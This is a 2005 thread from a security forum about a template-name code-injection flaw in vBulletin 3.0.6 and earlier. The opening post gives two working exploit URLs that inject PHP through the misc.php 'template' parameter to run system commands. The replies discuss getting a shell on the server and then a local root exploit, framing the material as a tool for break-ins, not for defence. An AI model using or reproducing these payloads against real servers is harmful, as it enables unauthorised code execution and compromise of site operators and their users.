Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 219
Members: 0
Total: 219
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Shell commands injection -> vBulletin 3.0.6 and prior versions Exec commands in server
Post new topicReply to topic View previous topic :: View next topic
vBulletin 3.0.6 and prior versions Exec commands in server
PostPosted: Wed Feb 23, 2005 2:39 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




vBulletin Version(s): 3.0.6 and prior versions

in the processing of template names. A remote user can execute PHP commands in certain cases.

If the 'Add Template Name in HTML Comments' option is enabled (which is not the default configuration and is not recommended by the vendor for use in a production environment), a remote user can submit PHP code in the 'template' parameter in 'misc.php'


Real Life code exploit

Code:
http://[target]//forum/misc.php?do=page&template={${system(id)}}


Code:
http://[target]//forum/misc.php?do=page&template={${phpinfo()}}


www.sosvulnerable.net - svsecurity@gmail.com
View user's profile Send private message Visit poster's website
PostPosted: Wed Feb 23, 2005 4:40 pm Reply with quote
Alkaen
Regular user
Regular user
Joined: Feb 16, 2005
Posts: 5
Location: Bahrain - Aldair




Thanx dude
& wait alot of exploit in vBulletin Version 3.0.6

Alkaen..
View user's profile Send private message Visit poster's website
PostPosted: Wed Feb 23, 2005 9:47 pm Reply with quote
SteX
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia




Original Link: http://www.milw0rm.com/id.php?id=832

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Thu Feb 24, 2005 10:43 am Reply with quote
Zeelock
Active user
Active user
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night




SteX wrote:
Original Link: http://www.milw0rm.com/id.php?id=832


Made by Pokleyzz

_________________
If it seems to be impossible, just step up your level!
View user's profile Send private message
PostPosted: Thu Feb 24, 2005 4:07 pm Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




if the server has SAFE MODE ON mmm i dont think that will be useful
View user's profile Send private message
PostPosted: Thu Mar 24, 2005 4:22 pm Reply with quote
octane
Beginner
Beginner
Joined: Mar 24, 2005
Posts: 2




cant you like execute a small shell on the server? if its running windows for example?
View user's profile Send private message
PostPosted: Fri Mar 25, 2005 12:56 pm Reply with quote
Injector
Active user
Active user
Joined: Dec 29, 2004
Posts: 49




octane wrote:
cant you like execute a small shell on the server? if its running windows for example?


You cant execute simple commands like ls, pwd etc. but thats pretty much it

especially that vbulletin is secure you wont really go far with that exploit
View user's profile Send private message
PostPosted: Fri Mar 25, 2005 1:22 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




Zeelock wrote:
SteX wrote:
Original Link: http://www.milw0rm.com/id.php?id=832


Made by Pokleyzz


pokyleyzz WAS HERE !!!

heuheueue

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Mar 25, 2005 2:07 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




HaCkZataN wrote:
if the server has SAFE MODE ON mmm i dont think that will be useful


for further information we cpuld look php manual (good if u have compiled html (.chm)) then u could see what function restriction by safe_mode

Wink

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Mar 26, 2005 3:20 pm Reply with quote
octane
Beginner
Beginner
Joined: Mar 24, 2005
Posts: 2




Injector wrote:
octane wrote:
cant you like execute a small shell on the server? if its running windows for example?


You cant execute simple commands like ls, pwd etc. but thats pretty much it

especially that vbulletin is secure you wont really go far with that exploit


so what good does this exploit do if you cant get root Sad
View user's profile Send private message
PostPosted: Sat Mar 26, 2005 3:34 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




octane wrote:
Injector wrote:
octane wrote:
cant you like execute a small shell on the server? if its running windows for example?


You cant execute simple commands like ls, pwd etc. but thats pretty much it

especially that vbulletin is secure you wont really go far with that exploit


so what good does this exploit do if you cant get root Sad


at least you inside the machine Smile
after that USE your brain :LOL:

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Tue Mar 29, 2005 8:53 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




octane wrote:
Injector wrote:
octane wrote:
cant you like execute a small shell on the server? if its running windows for example?


You cant execute simple commands like ls, pwd etc. but thats pretty much it

especially that vbulletin is secure you wont really go far with that exploit


so what good does this exploit do if you cant get root Sad


Then you need good local root exploit Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Jul 18, 2005 10:38 am Reply with quote
logan
Beginner
Beginner
Joined: Jul 10, 2005
Posts: 2




nice thank you
View user's profile Send private message
vBulletin 3.0.6 and prior versions Exec commands in server
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.316 Seconds